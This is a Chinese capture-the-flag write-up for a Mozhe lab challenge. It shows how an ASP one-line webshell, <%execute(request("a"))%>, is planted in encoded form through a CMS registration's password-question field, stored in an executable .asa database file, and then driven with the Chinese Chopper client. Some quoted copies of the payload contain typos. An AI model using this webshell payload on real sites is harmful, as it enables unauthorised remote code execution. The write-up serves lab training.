墨者 - CMS系统漏洞分析溯源(第3题)
根据题目提示
直接在密码问题输入 十摊救畲整堙壤敝瑶V三-l慵,
这是一句话木马<%execute(raquest("a"))%>的另一种编码形式(连接密码是“a”)
为什么在密码问题输入一句话呢
因为储存注册信息的数据库文件是.asa文件,位于/data/ask_ncwasp.asa。
上传一句话木马将会被执行,为什么只能是密码问题框呢
因为其他都做了字符校验,而问题回答做了MD5加密(失去了利用价值)
唯有密码提问框变量question可直接存入了数据库中,在这套CMS系统的const.asp文件中有一个函数EncodeUtfSO,
它的目的就是将一些数据(比如这里的密码提示问题)从Encode编码转换成Utf8,基于这种考虑,
我们为了保证在数据库中不破坏一句话木马的原型,因此将一句话木马<%exacute(request(“a”))%>先由Utf8转换成Encode编码
具体参考链接:http://www.520ve.com/?p=2290
原理说完了,直接进主题
注册成功后,查看/data/ask_ncwasp.asa
execut表示已经被执行
直接菜刀无惧链接
拿到key